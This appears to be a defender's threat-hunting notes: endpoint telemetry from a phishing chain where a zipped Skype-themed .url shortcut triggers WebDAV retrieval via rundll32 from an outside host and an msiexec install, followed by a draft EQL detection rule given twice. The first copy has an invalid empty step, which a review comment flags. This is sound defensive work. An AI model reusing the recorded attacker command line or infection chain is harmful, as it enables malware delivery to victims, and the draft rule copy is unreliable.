"process": { | |
"args": [ | |
"rundll32.exe", | |
"C:\\WINDOWS\\system32\\davclnt.dll,DavSetCookie", | |
"brukjanesis.com@80", | |
"http://brukjanesis.com/TrdGallery/ResultTrd.bmp.url" | |
], | |
C:\Program Files\WinRAR\WinRAR.exe | |
C:\Users\bouss\AppData\Local\Temp\Rar$DIa2832.411\Important Information Skype.url | |
C:\Windows\explorer.exe | |
C:\Users\bouss\AppData\Local\Temp\aa4160eb-4c4d-4406-8fab-54396122f4fd_Important Information Skype.zip.4fd\Important Information Skype.url | |
Download: aaaImageusci[1].msi | |
C:\Users\bouss\AppData\Local\Microsoft\Windows\INetCache\IE\6W5T5IQD\aaaImageusci[1].msi | |
C:\Windows\explorer.exe | |
ntdll.dll|kernelbase.dll|wininet.dll|shell32.dll|windows.storage.dll|shell32.dll|ieframe.dll|shell32.dll|ieframe.dll|shell32.dll|shcore.dll|kernel32.dll|ntdll.dll | |
C:\Program Files\WinRAR\WinRAR.exe | |
ntdll.dll|kernelbase.dll|wininet.dll|shell32.dll|windows.storage.dll|shell32.dll|ieframe.dll|shell32.dll|shcore.dll|kernel32.dll|ntdll.dll | |
C:\Windows\explorer.exe | |
ntdll.dll|kernelbase.dll|wininet.dll|shell32.dll|windows.storage.dll|shell32.dll|ieframe.dll|shell32.dll|shcore.dll|kernel32.dll|ntdll.dll | |
C:\Users\bouss\AppData\Local\Microsoft\Windows\INetCache\IE\6W5T5IQD\aaaImageusci[1].msi | |
C:\WINDOWS\Explorer.EXE | |
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\bouss\Downloads\Important Information Skype.zip" | |
"C:\WINDOWS\System32\msiexec.exe" /i "C:\Users\bouss\AppData\Local\Microsoft\Windows\INetCache\IE\6W5T5IQD\aaaImageusci[1].msi" | |
"ntdll.dll|kernelbase.dll|kernel32.dll|windows.storage.dll|shell32.dll|ieframe.dll|shell32.dll|shcore.dll|kernel32.dll|ntdll.dll", | |
"ntdll.dll|kernelbase.dll|kernel32.dll|windows.storage.dll|shell32.dll|ieframe.dll|shell32.dll|ieframe.dll|shell32.dll|shcore.dll|kernel32.dll|ntdll.dll" | |
https://www.virustotal.com/gui/search/content%253A%2522%255BInternetShortcut%255D%2522%2520and%2520content%253A%2522URL%253Dfile%253A%252F%252F%2522%2520and%2520tag%253Ajavascript%2520and%2520content%253A%2522.url%2522 | |
PSA: Files executed via WebDAV are copied locally to C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV | |
process.thread.Ext.call_stack_summary : ntdll.dll|kernelbase.dll|webclnt.dll|kernel32.dll|ntdll.dll | |
C:\WINDOWS\system32\svchost.exe -k LocalService -p -s WebClient | |
// Detection rule (EQL, first draft): a process launched out of the IE cache, followed within 3 minutes
// on the same host by the WebClient service removing a .url file from its local WebDAV staging folder.
// Two events are correlated per host.id; maxspan=3m is the maximum gap between them.
sequence by host.id with maxspan=3m | |
// 1) Parent is the shell or an archive manager (explorer.exe, WinRAR, 7-Zip) and the child's command
//    line references the IE INetCache folder — consistent with the msiexec.exe launch of the cached .msi
//    recorded above. ":" is a case-insensitive match, so the parent-name list and the path wildcard are
//    not case-sensitive.
[process where event.action == "start" and | |
process.parent.name : ("explorer.exe", "winrar.exe", "7zFM.exe") and | |
process.command_line : "*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\*"] | |
// NOTE(review): an empty "[]" is not a valid sequence step in EQL as far as I know; the copy of the rule
// immediately below omits it and is presumably the intended version.
[] | |
// 2) svchost.exe (hosting the WebClient service, per the call-stack and command-line notes above) deletes
//    a .url file under Tfs_DAV, the folder where WebDAV-launched files are copied locally (see the PSA
//    above). "{*}" matches a brace-wrapped file name — likely a GUID, to be confirmed against telemetry.
// NOTE(review): "==" is case-sensitive in EQL while ":" is not, so file.extension == "url" would miss an
// upper-case extension; `file.extension : "url"` would be the consistent choice.
[file where event.action == "deletion" and process.name : "svchost.exe" and file.extension == "url" and | |
file.path : "?:\\WINDOWS\\*\\TfsStore\\Tfs_DAV\\{*}.url"] | |
// Detection rule (EQL): a process launched out of the IE cache, followed within 3 minutes on the same
// host by the WebClient service removing a .url file from its local WebDAV staging folder. This is the
// same rule as the one above without the stray empty step. Events are correlated per host.id; maxspan=3m
// is the maximum gap between the two steps.
sequence by host.id with maxspan=3m | |
// 1) Parent is the shell or an archive manager (explorer.exe, WinRAR, 7-Zip) and the child's command
//    line references the IE INetCache folder — consistent with the msiexec.exe launch of the cached .msi
//    recorded above. ":" is a case-insensitive match, so the parent-name list and the path wildcard are
//    not case-sensitive.
[process where event.action == "start" and | |
process.parent.name : ("explorer.exe", "winrar.exe", "7zFM.exe") and | |
process.command_line : "*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\*"] | |
// 2) svchost.exe (hosting the WebClient service, per the call-stack and command-line notes above) deletes
//    a .url file under Tfs_DAV, the folder where WebDAV-launched files are copied locally (see the PSA
//    above). "{*}" matches a brace-wrapped file name — likely a GUID, to be confirmed against telemetry.
// NOTE(review): "==" is case-sensitive in EQL while ":" is not, so file.extension == "url" would miss an
// upper-case extension; `file.extension : "url"` would be the consistent choice.
[file where event.action == "deletion" and process.name : "svchost.exe" and file.extension == "url" and | |
file.path : "?:\\WINDOWS\\*\\TfsStore\\Tfs_DAV\\{*}.url"] | |